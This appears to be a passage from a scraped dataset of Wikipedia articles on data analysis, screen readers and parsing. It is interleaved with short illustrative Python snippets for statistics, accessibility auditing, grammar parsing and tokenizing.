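outliers = records[(records["amount"] < q1 - 1.5 * iqr) | (records["amount"] > q3 + 1.5 * iqr)]
print(outliers)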
39 It may be described as (Y = aX + b + error), where the model is designed such that (a) and (b) minimize the error when the model predicts Y for a given range of values of X. 40 Analysts may also attempt to build models that are descriptive of the data, with the aim of simplifying analysis and communicating results. 11 A data product is a computer application that takes data inputs and generates outputs, feeding them back into the environment. 41 It may be based on a model or algorithm. For instance, an application that analyzes data about customer purchase history, and uses the results to recommend other purchases the customer might enjoy. 42 13 Once data is analyzed, it may be reported in many formats to the users of the analysis to support their requirements. 44 The users may have feedback, which results in additional analysis. As such, much of the analytical cycle is iterative. 13 When determining how to communicate the results, the analyst may consider implementing a variety of data visualization techniques to help communicate the message more clearly and efficiently to the audience. 45 Data visualization uses information displays (graphics such as tables and charts) to help communicate key messages contained in the data. 46 Tables are a valuable tool because they enable a user to query and focus on specific numbers, while charts (e.g., bar charts or line charts) may help explain the quantitative messages contained in the data. 47 Stephen Few described eight types of quantitative messages that users may attempt to understand or communicate from a set of data and the associated graphs used to help communicate the message. 48 Customers specifying requirements and analysts performing the data analysis may consider these messages during the course of the process. 49 Author Jonathan Koomey has recommended a series of best practices for understanding quantitative data. 60 These include: For the variables under examination, analysts typically obtain descriptive statistics, such as the mean (average), median, and standard deviation. 61 They may also analyze the distribution of the key variables to see how the individual values cluster around the mean. 62 The consultants at McKinsey & Company named a technique for breaking a quantitative problem down into its component parts the MECE principle. 63 Each layer can be broken down into its components; each of the sub-components must be mutually exclusive of the others and collectively add up to the layer above them. 64 The relationship is referred to as "Mutually Exclusive and Collectively Exhaustive" or MECE. For example, profit by definition can be broken down into total revenue and total cost. 65 In turn, total revenue can be analyzed by its components, such as the revenue of divisions A, B, and C (which are mutually exclusive of each other), which should add up to the total revenue (collectively exhaustive). 66 Analysts may use robust statistical measurements to solve certain analytical problems. 67 Hypothesis testing is used when a particular hypothesis about the true state of affairs is made by the analyst and data is gathered to determine whether that state of affairs is true or false. 68 69 For example, the hypothesis might be that "Unemployment has no effect on inflation", which relates to an economics concept called the Phillips Curve. 70 Hypothesis testing involves considering the likelihood of Type I and Type II errors, which relate to whether the data supports accepting or rejecting the hypothesis.
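A minimal numerical illustration of the (Y = aX + b + error) model above: numpy.polyfit chooses a and b so as to minimize the squared error. numpy ships as a dependency of pandas; the advertising and sales figures are made up for illustration.
import numpy as np

advertising = np.array([1.0, 2.0, 3.0, 4.0, 5.0])   # independent variable X
sales       = np.array([2.1, 4.3, 5.9, 8.2, 9.8])   # dependent variable Y

a, b = np.polyfit(advertising, sales, deg=1)         # fit Y ~ aX + b
residuals = sales - (a * advertising + b)            # the "error" term
print(f"a={a:.2f}, b={b:.2f}, mean abs error={np.abs(residuals).mean():.3f}")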
71 72 Regression analysis may be used when the analyst is trying to determine the extent to which independent variable X affects dependent variable Y (e.g., "To what extent do changes in the unemployment rate (X) affect the inflation rate (Y)?"). 73 This is an attempt to model or fit an equation line or curve to the data, such that Y is a function of X. 74 75 Necessary condition analysis (NCA) may be used when the analyst is trying to determine the extent to which independent variable X allows variable Y (e.g., "To what extent is a certain unemployment rate (X) necessary for a certain inflation rate (Y)?"). 73 Whereas (multiple) regression analysis uses additive logic where each X-variable can produce the outcome and the X's can compensate for each other (they are sufficient but not necessary), 76 necessary condition analysis (NCA) uses necessity logic, where one or more X-variables allow the outcome to exist, but may not produce it (they are necessary but not sufficient). Each single necessary condition must be present and compensation is not possible. 77 Users may have particular data points of interest within a data set, as opposed to the general messaging outlined above. Such low-level user analytic activities are presented in the following table. The taxonomy can also be organized by three poles of activities: retrieving values, finding data points, and arranging data points. 78 79 80 81 - How long is the movie Gone with the Wind? - What comedies have won awards? - Which funds underperformed the S&P 500? - What is the gross income of all stores combined? - How many manufacturers of cars are there? - What director/film has won the most awards? - What Marvel Studios film has the most recent release date? - Rank the cereals by calories. - What is the range of car horsepowers? - What actresses are in the data set? - What is the age distribution of shoppers? - Are there any outliers in protein? - Is there a cluster of typical film lengths? - Is there a correlation between country of origin and MPG? - Do different genders have a preferred payment method? - Is there a trend of increasing film length over the years? Barriers to effective analysis may exist among the analysts performing the data analysis or among the audience. Distinguishing fact from opinion, cognitive biases, and innumeracy are all challenges to sound data analysis. 82 "You are entitled to your own opinion, but you are not entitled to your own facts." — Daniel Patrick Moynihan Effective analysis requires obtaining relevant facts to answer questions, support a conclusion or formal opinion, or test hypotheses. 83 84 Facts by definition are irrefutable, meaning that any person involved in the analysis should be able to agree upon them. 85 For example, in August 2010, the Congressional Budget Office (CBO) estimated that extending the Bush tax cuts of 2001 and 2003 for the 2011–2020 time period would add approximately $3.3 trillion to the national debt. 86 Everyone should be able to agree that this is indeed what the CBO reported; they can all examine the report. This makes it a fact. Whether persons agree or disagree with the CBO is their own opinion. 87 As another example, the auditor of a public company must arrive at a formal opinion on whether financial statements of publicly traded corporations are "fairly stated, in all material respects". 88 This requires extensive analysis of factual data and evidence to support their opinion.
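The low-level analytic activities listed above (retrieve a value, filter, compute an aggregate, rank, find correlations) map directly onto pandas operations. The film table below is a made-up toy example.
import pandas as pd

films = pd.DataFrame({
    "title":  ["A", "B", "C", "D"],
    "genre":  ["comedy", "drama", "comedy", "action"],
    "length": [95, 130, 88, 121],
    "awards": [1, 4, 0, 2],
})

print(films.loc[films["title"] == "A", "length"].item())     # retrieve a value
print(films[films["genre"] == "comedy"])                     # filter
print(films["length"].mean())                                # compute an aggregate
print(films.sort_values("awards", ascending=False).head(1))  # find the extremum / rank
print(films["length"].corr(films["awards"]))                 # correlation between two fields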
When making the leap from facts to opinions, there is always the possibility that the opinion is erroneous. 89 There are a variety of cognitive biases that can adversely affect analysis. For example, confirmation bias is the tendency to search for or interpret information in a way that confirms one's preconceptions. 90 In addition, individuals may discredit information that does not support their views. 91 Analysts may be trained specifically to be aware of these biases and how to overcome them. 92 In his book Psychology of Intelligence Analysis, retired CIA analyst Richards Heuer wrote that analysts should clearly delineate their assumptions and chains of inference and specify the degree and source of the uncertainty involved in the conclusions. 93 He emphasized procedures to help surface and debate alternative points of view. 94 Effective analysts are generally adept with a variety of numerical techniques. However, audiences may not have such literacy with numbers or numeracy; they are said to be innumerate. 95 Persons communicating the data may also be attempting to mislead or misinform, deliberately using bad numerical techniques. 96 For example, whether a number is rising or falling may not be the key factor. More important may be the number relative to another number, such as the size of government revenue or spending relative to the size of the economy (GDP) or the amount of cost relative to revenue in corporate financial statements. 97 This numerical technique is referred to as normalization 25 or common-sizing. There are many such techniques employed by analysts, whether adjusting for inflation (i.e., comparing real vs. nominal data) or considering population increases, demographics, etc. 98 Analysts apply a variety of techniques to address the various quantitative messages described in the section above. 99 Analysts may also analyze data under different assumptions or scenario. For example, when analysts perform financial statement analysis, they will often recast the financial statements under different assumptions to help arrive at an estimate of future cash flow, which they then discount to present value based on some interest rate, to determine the valuation of the company or its stock. 100 101 Similarly, the CBO analyzes the effects of various policy options on the government's revenue, outlays and deficits, creating alternative future scenarios for key measures. 102 A data analytics approach can be used in order to predict energy consumption in buildings. 103 The different steps of the data analysis process are carried out in order to realise smart buildings, where the building management and control operations including heating, ventilation, air conditioning, lighting and security are realised automatically by miming the needs of the building users and optimising resources like energy and time. 104 Analytics is the "extensive use of data, statistical and quantitative analysis, explanatory and predictive models, and fact-based management to drive decisions and actions. It is a subset of business intelligence, which is a set of technologies and processes that uses data to understand and analyze business performance to drive decision-making . 105 In education, most educators have access to a data system for the purpose of analyzing student data. 
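The normalization ("common-sizing") technique mentioned above reduces to expressing one series relative to another, as in this illustrative sketch (the figures are invented):
import pandas as pd

budget = pd.DataFrame({
    "year":     [2020, 2021, 2022],
    "spending": [4.5, 5.0, 5.3],     # trillions, nominal
    "gdp":      [21.0, 23.0, 25.5],
})

budget["spending_pct_gdp"] = 100 * budget["spending"] / budget["gdp"]
print(budget)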
106 These data systems present data to educators in an over-the-counter data format (embedding labels, supplemental documentation, and a help system and making key package display and content decisions) to improve the accuracy of educators’ data analyses. 107 This section contains rather technical explanations that may assist practitioners but are beyond the typical scope of a Wikipedia article. 108 The most important distinction between the initial data analysis phase and the main analysis phase, is that during initial data analysis one refrains from any analysis that is aimed at answering the original research question. 109 The initial data analysis phase is guided by the following four questions: 110 The quality of the data should be checked as early as possible. Data quality can be assessed in several ways, using different types of analysis: frequency counts, descriptive statistics (mean, standard deviation, median), normality (skewness, kurtosis, frequency histograms), normal imputation is needed. 111 The choice of analyses to assess the data quality during the initial data analysis phase depends on the analyses that will be conducted in the main analysis phase. 114 The quality of the measurement instruments should only be checked during the initial data analysis phase when this is not the focus or research question of the study. 115 116 One should check whether structure of measurement instruments corresponds to structure reported in the literature. There are two ways to assess measurement quality: After assessing the quality of the data and of the measurements, one might decide to impute missing data, or to perform initial transformations of one or more variables, although this can also be done during the main analysis phase. 119 Possible transformations of variables are: 120 One should check the success of the randomization procedure, for instance by checking whether background and substantive variables are equally distributed within and across groups. 121 If the study did not need or use a randomization procedure, one should check the success of the non-random sampling, for instance by checking whether all subgroups of the population of interest are represented in sample. 122 Other possible data distortions that should be checked are: In any report or article, the structure of the sample must be accurately described. 124 125 It is especially important to exactly determine the structure of the sample (and specifically the size of the subgroups) when subgroup analyses will be performed during the main analysis phase. 126 The characteristics of the data sample can be assessed by looking at: During the final stage, the findings of the initial data analysis are documented, and necessary, preferable, and possible corrective actions are taken. 128 Also, the original plan for the main data analyses can and should be specified in more detail or rewritten. 129 In order to do this, several decisions about the main data analyses can and should be made: Several analyses can be used during the initial data analysis phase: 131 It is important to take the measurement levels of the variables into account for the analyses, as special statistical techniques are available for each level: 132 Nonlinear analysis is often necessary when the data is recorded from a nonlinear system. Nonlinear systems can exhibit complex dynamic effects including bifurcations, chaos, harmonics and subharmonics that cannot be analyzed using simple linear methods. 
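A quick initial-data-analysis pass of the kind described above can be scripted with pandas: frequency counts for the randomization check, descriptive statistics, and skewness/kurtosis as normality indicators. The column names and values are hypothetical.
import pandas as pd

sample = pd.DataFrame({
    "group": ["treatment", "control", "treatment", "control", "treatment"],
    "score": [12.1, 9.8, 11.4, 10.2, 35.0],
})

print(sample["group"].value_counts())                   # frequency counts per group
print(sample["score"].describe())                       # mean, std, median (50%), range
print(sample["score"].skew(), sample["score"].kurt())   # skewness and kurtosis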
Nonlinear data analysis is closely related to nonlinear system identification. 133 In the main analysis phase, analyses aimed at answering the research question are performed as well as any other relevant analysis needed to write the first draft of the research report. 134 In the main analysis phase, either an exploratory or confirmatory approach can be adopted. Usually the approach is decided before data is collected. 135 In an exploratory analysis no clear hypothesis is stated before analysing the data, and the data is searched for models that describe the data well. 136 In a confirmatory analysis clear hypotheses about the data are tested. 137 Exploratory data analysis should be interpreted carefully. When testing multiple models at once there is a high chance on finding at least one of them to be significant, but this can be due to a type 1 error. 138 It is important to always adjust the significance level when testing multiple models with, for example, a Bonferroni correction. 139 Also, one should not follow up an exploratory analysis with a confirmatory analysis in the same dataset. 140 An exploratory analysis is used to find ideas for a theory, but not to test that theory as well. 140 When a model is found exploratory in a dataset, then following up that analysis with a confirmatory analysis in the same dataset could simply mean that the results of the confirmatory analysis are due to the same type 1 error that resulted in the exploratory model in the first place. 140 The confirmatory analysis therefore will not be more informative than the original exploratory analysis. 141 It is important to obtain some indication about how generalizable the results are. 142 While this is often difficult to check, one can look at the stability of the results. Are the results reliable and reproducible? There are two main ways of doing that. 143 Notable free software for data analysis include: The typical data analysis workflow involves collecting data, running analyses through various scripts, creating visualizations, and writing reports. However, this workflow presents challenges, including a separation between analysis scripts and data, as well as a gap between analysis and documentation. Often, the correct order of running scripts is only described informally or resides in the data scientist's memory. The potential for losing this information creates issues for reproducibility. To address these challenges, it is essential to have analysis scripts written for automated, reproducible workflows. Additionally, dynamic documentation is crucial, providing reports that are understandable by both machines and humans, ensuring accurate representation of the analysis workflow even as scripts evolve. 150 Different companies or organizations hold data analysis contests to encourage researchers to utilize their data or to solve a particular question using data analysis. 151 152 A few examples of well-known international data analysis contests are as follows: 153 |
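The Bonferroni correction mentioned above is simple arithmetic: divide the significance level by the number of models tested. The p-values below are invented for illustration.
alpha = 0.05
p_values = [0.004, 0.03, 0.20, 0.012]           # one p-value per model tested

adjusted_alpha = alpha / len(p_values)           # Bonferroni-corrected threshold
significant = [p for p in p_values if p < adjusted_alpha]
print(f"threshold={adjusted_alpha:.4f}, significant={significant}")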
84 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Screen_reader | A screen reader is a form of assistive technology (AT) 1 that renders text and image content as speech or braille output. Screen readers are essential to people who are blind, 2 and are useful to people who are visually impaired, 2 illiterate, or have a learning disability. 3 Screen readers are software applications that attempt to convey what people with normal eyesight see on a display to their users via non-visual means, like text-to-speech, 4 sound icons, 5 or a braille device. 2 They do this by applying a wide variety of techniques that include, for example, interacting with dedicated accessibility APIs, using various operating system features (like inter-process communication and querying user interface properties), and employing hooking techniques. 6 Microsoft Windows operating systems have included the Microsoft Narrator screen reader since Windows 2000, though separate products such as Freedom Scientific's commercially available JAWS screen reader and ZoomText screen magnifier and the free and open source screen reader NVDA by NV Access are more popular for that operating system. 7 Apple Inc.'s macOS, iOS, and tvOS include VoiceOver as a built-in screen reader, while Google's Android provides the Talkback screen reader and its ChromeOS can use ChromeVox. 8 Similarly, Android-based devices from Amazon provide the VoiceView screen reader. There are also free and open source screen readers for Linux and Unix-like systems, such as Speakup and Orca. In early operating systems, such as MS-DOS, which employed command-line interfaces (CLIs), the screen display consisted of characters mapping directly to a screen buffer in memory and a cursor position. Input was by keyboard. All this information could therefore be obtained from the system either by hooking the flow of information around the system and reading the screen buffer or by using a standard hardware output socket 9 and communicating the results to the user. In the 1980s, the Research Centre for the Education of the Visually Handicapped (RCEVH) at the University of Birmingham developed a Screen Reader for the BBC Micro and NEC Portable. 10 11 With the arrival of graphical user interfaces (GUIs), the situation became more complicated. A GUI has characters and graphics drawn on the screen at particular positions, and therefore there is no purely textual representation of the graphical contents of the display. Screen readers were therefore forced to employ new low-level techniques, gathering messages from the operating system and using these to build up an "off-screen model", a representation of the display in which the required text content is stored. 12 For example, the operating system might send messages to draw a command button and its caption. These messages are intercepted and used to construct the off-screen model. The user can switch between controls (such as buttons) available on the screen and the captions and control contents will be read aloud and or shown on a refreshable braille display. Screen readers can also communicate information on menus, controls, and other visual constructs to permit blind users to interact with these constructs. However, maintaining an off-screen model is a significant technical challenge; hooking the low-level messages and maintaining an accurate model are both difficult tasks. 
citation needed Operating system and application designers have attempted to address these problems by providing ways for screen readers to access the display contents without having to maintain an off-screen model. These involve the provision of alternative and accessible representations of what is being displayed on the screen accessed through an API. Existing APIs include: Screen readers can query the operating system or application for what is currently being displayed and receive updates when the display changes. For example, a screen reader can be told that the current focus is on a button and the button caption to be communicated to the user. This approach is considerably easier for the developers of screen readers, but fails when applications do not comply with the accessibility API: for example, Microsoft Word does not comply with the MSAA API, so screen readers must still maintain an off-screen model for Word or find another way to access its contents. citation needed One approach is to use available operating system messages and application object models to supplement accessibility APIs. Screen readers can be assumed to be able to access all display content that is not intrinsically inaccessible. Web browsers, word processors, icons and windows and email programs are just some of the applications used successfully by screen reader users. However, according to some users, who? using a screen reader is considerably more difficult than using a GUI, and many applications have specific problems resulting from the nature of the application (e.g. animations) or failure to comply with accessibility standards for the platform (e.g. Microsoft Word and Active Accessibility). citation needed Some programs and applications have voicing technology built in alongside their primary functionality. These programs are termed self-voicing and can be a form of assistive technology if they are designed to remove the need to use a screen reader. citation needed Some telephone services allow users to interact with the internet remotely. For example, TeleTender can read web pages over the phone and does not require special programs or devices on the user side. citation needed Virtual assistants can sometimes read out written documents (textual web content, PDF documents, e-mails etc.) The best-known examples are Apple's Siri, Google Assistant, and Amazon Alexa. A relatively new development in the field is web-based applications like Spoken-Web that act as web portals, managing content like news updates, weather, science and business articles for visually-impaired or blind computer users. citation needed Other examples are ReadSpeaker or BrowseAloud that add text-to-speech functionality to web content. citation needed The primary audience for such applications is those who have difficulty reading because of learning disabilities or language barriers. citation needed Although functionality remains limited compared to equivalent desktop applications, the major benefit is to increase the accessibility of said websites when viewed on public machines where users do not have permission to install custom software, giving people greater "freedom to roam". citation needed This functionality depends on the quality of the software but also on a logical structure of the text. Use of headings, punctuation, presence of alternate attributes for images, etc. is crucial for a good vocalization. 
Also, a web site may have an attractive look because of appropriate two-dimensional positioning with CSS, but its standard linearization (for example, obtained by suppressing all CSS and JavaScript in the browser) may not be comprehensible. citation needed Most screen readers allow the user to select whether most punctuation is announced or silently ignored. Some screen readers can be tailored to a particular application through scripting. One advantage of scripting is that it allows customizations to be shared among users, increasing accessibility for all. JAWS enjoys an active script-sharing community, for example. citation needed Verbosity is a feature of screen reading software that supports vision-impaired computer users. Speech verbosity controls enable users to choose how much speech feedback they wish to hear. Specifically, verbosity settings allow users to construct a mental model of web pages displayed on their computer screen. Based on verbosity settings, a screen-reading program informs users of certain formatting changes, such as when a frame or table begins and ends, where graphics have been inserted into the text, or when a list appears in the document. The verbosity settings can also control the level of descriptiveness of elements, such as lists, tables, and regions. 16 For example, JAWS provides low, medium, and high web verbosity preset levels. The high web verbosity level provides more detail about the contents of a webpage. 17 Some screen readers can read text in more than one language, provided that the language of the material is encoded in its metadata. 18 Screen reading programs like JAWS, NVDA, and VoiceOver also include language verbosity, which automatically detects verbosity settings related to speech output language. For example, if a user navigated to a website based in the United Kingdom, the text would be read with an English accent. citation needed |
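Tying the points above about headings and alternate attributes back to this notebook's toolkit, here is a hedged sketch of a small accessibility audit: it flags images without alt text, which a screen reader cannot vocalize meaningfully. The target page is illustrative.
import requests
from bs4 import BeautifulSoup

page = requests.get("https://en.wikipedia.org/wiki/Screen_reader", timeout=10).text
soup = BeautifulSoup(page, "html5lib")

missing_alt = [img.get("src") for img in soup.find_all("img") if not img.get("alt")]
headings = [h.name for h in soup.find_all(["h1", "h2", "h3"])]
print(f"{len(missing_alt)} images lack alt text; heading outline: {headings[:10]}")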
85 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Parsing | Parsing, syntax analysis, or syntactic analysis is the process of analyzing a string of symbols, either in natural language, computer languages or data structures, conforming to the rules of a formal grammar. The term parsing comes from Latin pars (orationis), meaning part (of speech). 1 The term has slightly different meanings in different branches of linguistics and computer science. Traditional sentence parsing is often performed as a method of understanding the exact meaning of a sentence or word, sometimes with the aid of devices such as sentence diagrams. It usually emphasizes the importance of grammatical divisions such as subject and predicate. Within computational linguistics the term is used to refer to the formal analysis by a computer of a sentence or other string of words into its constituents, resulting in a parse tree showing their syntactic relation to each other, which may also contain semantic information. citation needed Some parsing algorithms generate a parse forest or list of parse trees from a string that is syntactically ambiguous. 2 The term is also used in psycholinguistics when describing language comprehension. In this context, parsing refers to the way that human beings analyze a sentence or phrase (in spoken language or text) "in terms of grammatical constituents, identifying the parts of speech, syntactic relations, etc. 1 This term is especially common when discussing which linguistic cues help speakers interpret garden-path sentences. Within computer science, the term is used in the analysis of computer languages, referring to the syntactic analysis of the input code into its component parts in order to facilitate the writing of compilers and interpreters. The term may also be used to describe a split or separation. The traditional grammatical exercise of parsing, sometimes known as clause analysis, involves breaking down a text into its component parts of speech with an explanation of the form, function, and syntactic relationship of each part. 3 This is determined in large part from study of the language's conjugations and declensions, which can be quite intricate for heavily inflected languages. To parse a phrase such as "man bites dog" involves noting that the singular noun "man" is the subject of the sentence, the verb "bites" is the third person singular of the present tense of the verb "to bite", and the singular noun "dog" is the object of the sentence. Techniques such as sentence diagrams are sometimes used to indicate relation between elements in the sentence. Parsing was formerly central to the teaching of grammar throughout the English-speaking world, and widely regarded as basic to the use and understanding of written language. However, the general teaching of such techniques is no longer current. citation needed In some machine translation and natural language processing systems, written texts in human languages are parsed by computer programs. 4 Human sentences are not easily parsed by programs, as there is substantial ambiguity in the structure of human language, whose usage is to convey meaning (or semantics) amongst a potentially unlimited range of possibilities, but only some of which are germane to the particular case. 
5 So an utterance "Man bites dog" versus "Dog bites man" is definite on one detail but in another language might appear as "Man dog bites" with a reliance on the larger context to distinguish between those two possibilities, if indeed that difference was of concern. It is difficult to prepare formal rules to describe informal behaviour even though it is clear that some rules are being followed. citation needed In order to parse natural language data, researchers must first agree on the grammar to be used. The choice of syntax is affected by both linguistic and computational concerns; for instance some parsing systems use lexical functional grammar, but in general, parsing for grammars of this type is known to be NP-complete. Head-driven phrase structure grammar is another linguistic formalism which has been popular in the parsing community, but other research efforts have focused on less complex formalisms such as the one used in the Penn Treebank. Shallow parsing aims to find only the boundaries of major constituents such as noun phrases. Another popular strategy for avoiding linguistic controversy is dependency grammar parsing. Most modern parsers are at least partly statistical; that is, they rely on a corpus of training data which has already been annotated (parsed by hand). This approach allows the system to gather information about the frequency with which various constructions occur in specific contexts. (See machine learning.) Approaches which have been used include straightforward PCFGs (probabilistic context-free grammars), 6 maximum entropy, 7 and neural nets. 8 Most of the more successful systems use lexical statistics (that is, they consider the identities of the words involved, as well as their part of speech). However such systems are vulnerable to overfitting and require some kind of smoothing to be effective. citation needed Parsing algorithms for natural language cannot rely on the grammar having 'nice' properties as with manually designed grammars for programming languages. As mentioned earlier some grammar formalisms are very difficult to parse computationally; in general, even if the desired structure is not context-free, some kind of context-free approximation to the grammar is used to perform a first pass. Algorithms which use context-free grammars often rely on some variant of the CYK algorithm, usually with some heuristic to prune away unlikely analyses to save time. (See chart parsing.) However some systems trade speed for accuracy using, e.g., linear-time versions of the shift-reduce algorithm. A somewhat recent development has been parse reranking in which the parser proposes some large number of analyses, and a more complex system selects the best option. citation needed In natural language understanding applications, semantic parsers convert the text into a representation of its meaning. 9 In psycholinguistics, parsing involves not just the assignment of words to categories (formation of ontological insights), but the evaluation of the meaning of a sentence according to the rules of syntax drawn by inferences made from each word in the sentence (known as connotation). This normally occurs as words are being heard or read. Neurolinguistics generally understands parsing to be a function of working memory, meaning that parsing is used to keep several parts of one sentence at play in the mind at one time, all readily accessible to be analyzed as needed. Because the human working memory has limitations, so does the function of sentence parsing. 
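To make the discussion of grammars and parse trees concrete, here is a toy context-free grammar run through NLTK's chart parser. NLTK is an assumption (it is not installed in the cells above), and the grammar is deliberately tiny.
import nltk

grammar = nltk.CFG.fromstring("""
    S  -> NP VP
    NP -> Det N | N
    VP -> V NP
    Det -> 'the'
    N  -> 'man' | 'dog'
    V  -> 'bites'
""")

parser = nltk.ChartParser(grammar)
for tree in parser.parse("man bites dog".split()):
    print(tree)   # e.g. (S (NP (N man)) (VP (V bites) (NP (N dog))))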
10 This is evidenced by several different types of syntactically complex sentences that propose potentially issues for mental parsing of sentences. The first, and perhaps most well-known, type of sentence that challenges parsing ability is the garden-path sentence. These sentences are designed so that the most common interpretation of the sentence appears grammatically faulty, but upon further inspection, these sentences are grammatically sound. Garden-path sentences are difficult to parse because they contain a phrase or a word with more than one meaning, often their most typical meaning being a different part of speech. 11 For example, in the sentence, "the horse raced past the barn fell", raced is initially interpreted as a past tense verb, but in this sentence, it functions as part of an adjective phrase. 12 Since parsing is used to identify parts of speech, these sentences challenge the parsing ability of the reader. Another type of sentence that is difficult to parse is an attachment ambiguity, which includes a phrase that could potentially modify different parts of a sentence, and therefore presents a challenge in identifying syntactic relationship (i.e. "The boy saw the lady with the telescope", in which the ambiguous phrase with the telescope could modify the boy saw or the lady.) 11 A third type of sentence that challenges parsing ability is center embedding, in which phrases are placed in the center of other similarly formed phrases (i.e. "The rat the cat the man hit chased ran into the trap".) Sentences with 2 or in the most extreme cases 3 center embeddings are challenging for mental parsing, again because of ambiguity of syntactic relationship. 13 Within neurolinguistics there are multiple theories that aim to describe how parsing takes place in the brain. One such model is a more traditional generative model of sentence processing, which theorizes that within the brain there is a distinct module designed for sentence parsing, which is preceded by access to lexical recognition and retrieval, and then followed by syntactic processing that considers a single syntactic result of the parsing, only returning to revise that syntactic interpretation if a potential problem is detected. 14 The opposing, more contemporary model theorizes that within the mind, the processing of a sentence is not modular, or happening in strict sequence. Rather, it poses that several different syntactic possibilities can be considered at the same time, because lexical access, syntactic processing, and determination of meaning occur in parallel in the brain. In this way these processes are integrated. 15 Although there is still much to learn about the neurology of parsing, studies have shown evidence that several areas of the brain might play a role in parsing. These include the left anterior temporal pole, the left inferior frontal gyrus, the left superior temporal gyrus, the left superior frontal gyrus, the right posterior cingulate cortex, and the left angular gyrus. Although it has not been absolutely proven, it has been suggested that these different structures might favor either phrase-structure parsing or dependency-structure parsing, meaning different types of parsing could be processed in different ways which have yet to be understood. 16 Discourse analysis examines ways to analyze language use and semiotic events. Persuasive language may be called rhetoric. 
A parser is a software component that takes input data (typically text) and builds a data structure often some kind of parse tree, abstract syntax tree or other hierarchical structure, giving a structural representation of the input while checking for correct syntax. The parsing may be preceded or followed by other steps, or these may be combined into a single step. The parser is often preceded by a separate lexical analyser, which creates tokens from the sequence of input characters; alternatively, these can be combined in scannerless parsing. Parsers may be programmed by hand or may be automatically or semi-automatically generated by a parser generator. Parsing is complementary to templating, which produces formatted output. These may be applied to different domains, but often appear together, such as the scanf printf pair, or the input (front end parsing) and output (back end code generation) stages of a compiler. The input to a parser is typically text in some computer language, but may also be text in a natural language or less structured textual data, in which case generally only certain parts of the text are extracted, rather than a parse tree being constructed. Parsers range from very simple functions such as scanf, to complex programs such as the frontend of a C compiler or the HTML parser of a web browser. An important class of simple parsing is done using regular expressions, in which a group of regular expressions defines a regular language and a regular expression engine automatically generating a parser for that language, allowing pattern matching and extraction of text. In other contexts regular expressions are instead used prior to parsing, as the lexing step whose output is then used by the parser. The use of parsers varies by input. In the case of data languages, a parser is often found as the file reading facility of a program, such as reading in HTML or XML text; these examples are markup languages. In the case of programming languages, a parser is a component of a compiler or interpreter, which parses the source code of a computer programming language to create some form of internal representation; the parser is a key step in the compiler frontend. Programming languages tend to be specified in terms of a deterministic context-free grammar because fast and efficient parsers can be written for them. For compilers, the parsing itself can be done in one pass or multiple passes see one-pass compiler and multi-pass compiler. The implied disadvantages of a one-pass compiler can largely be overcome by adding fix-ups, where provision is made for code relocation during the forward pass, and the fix-ups are applied backwards when the current program segment has been recognized as having been completed. An example where such a fix-up mechanism would be useful would be a forward GOTO statement, where the target of the GOTO is unknown until the program segment is completed. In this case, the application of the fix-up would be delayed until the target of the GOTO was recognized. Conversely, a backward GOTO does not require a fix-up, as the location will already be known. Context-free grammars are limited in the extent to which they can express all of the requirements of a language. Informally, the reason is that the memory of such a language is limited. The grammar cannot remember the presence of a construct over an arbitrarily long input; this is necessary for a language in which, for example, a name must be declared before it may be referenced. 
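As a small illustration of the regular-expression class of parsing described above, the sketch below tokenizes a string with Python's re module. The token names and the example input are invented for demonstration; a real language would define many more token classes.

# A small regex-based lexer (illustrative sketch; token names are invented).
import re

TOKEN_PATTERN = re.compile(r"""
    (?P<NUMBER>\d+(\.\d+)?)   # integer or decimal literal
  | (?P<NAME>[A-Za-z_]\w*)    # identifier
  | (?P<OP>[+\-*/^()=])       # single-character operators and parentheses
  | (?P<SKIP>\s+)             # whitespace, discarded
  | (?P<ERROR>.)              # anything else is reported as an error
""", re.VERBOSE)

def tokenize(text):
    for match in TOKEN_PATTERN.finditer(text):
        kind = match.lastgroup
        value = match.group()
        if kind == "SKIP":
            continue
        if kind == "ERROR":
            raise SyntaxError(f"unexpected character {value!r}")
        yield (kind, value)

print(list(tokenize("area = width * height + 2")))
# [('NAME', 'area'), ('OP', '='), ('NAME', 'width'), ('OP', '*'), ...]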
More powerful grammars that can express this constraint, however, cannot be parsed efficiently. Thus, it is a common strategy to create a relaxed parser for a context-free grammar which accepts a superset of the desired language constructs (that is, it accepts some invalid constructs); later, the unwanted constructs can be filtered out at the semantic analysis (contextual analysis) step. For example, in Python the following is syntactically valid code (see the reconstructed sketch below): The following code, however, is syntactically valid in terms of the context-free grammar, yielding a syntax tree with the same structure as the previous, but violates the semantic rule requiring variables to be initialized before use (also illustrated in the sketch below): The following example demonstrates the common case of parsing a computer language with two levels of grammar: lexical and syntactic. The first stage is the token generation, or lexical analysis, by which the input character stream is split into meaningful symbols defined by a grammar of regular expressions. For example, a calculator program would look at an input such as "12 * (3 + 4)^2" and split it into the tokens 12, *, (, 3, +, 4, ), ^, 2, each of which is a meaningful symbol in the context of an arithmetic expression. The lexer would contain rules to tell it that the characters *, +, ^, ( and ) mark the start of a new token, so meaningless tokens like "12*" or "(3" will not be generated. The next stage is parsing or syntactic analysis, which is checking that the tokens form an allowable expression. This is usually done with reference to a context-free grammar which recursively defines components that can make up an expression and the order in which they must appear. However, not all rules defining programming languages can be expressed by context-free grammars alone, for example type validity and proper declaration of identifiers. These rules can be formally expressed with attribute grammars. The final phase is semantic parsing or analysis, which is working out the implications of the expression just validated and taking the appropriate action. 17 In the case of a calculator or interpreter, the action is to evaluate the expression or program; a compiler, on the other hand, would generate some kind of code. Attribute grammars can also be used to define these actions. The task of the parser is essentially to determine if and how the input can be derived from the start symbol of the grammar. This can be done in essentially two ways: top-down parsing or bottom-up parsing. LL parsers and recursive-descent parsers are examples of top-down parsers that cannot accommodate left-recursive production rules. Although it has been believed that simple implementations of top-down parsing cannot accommodate direct and indirect left recursion and may require exponential time and space complexity while parsing ambiguous context-free grammars, more sophisticated algorithms for top-down parsing have been created by Frost, Hafiz, and Callaghan 20 21 which accommodate ambiguity and left recursion in polynomial time and which generate polynomial-size representations of the potentially exponential number of parse trees. Their algorithm is able to produce both left-most and right-most derivations of an input with regard to a given context-free grammar. An important distinction with regard to parsers is whether a parser generates a leftmost derivation or a rightmost derivation (see context-free grammar). LL parsers will generate a leftmost derivation and LR parsers will generate a rightmost derivation (although usually in reverse).
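The inline Python snippets referenced above did not survive extraction; the sketch below is a plausible reconstruction in the same spirit (the exact original code may have differed). Both snippets parse to syntax trees of the same shape, but the second uses a name that was never initialized, which only semantic analysis or execution catches.

# Sketch reconstructing the kind of example the passage refers to (not the original snippets).
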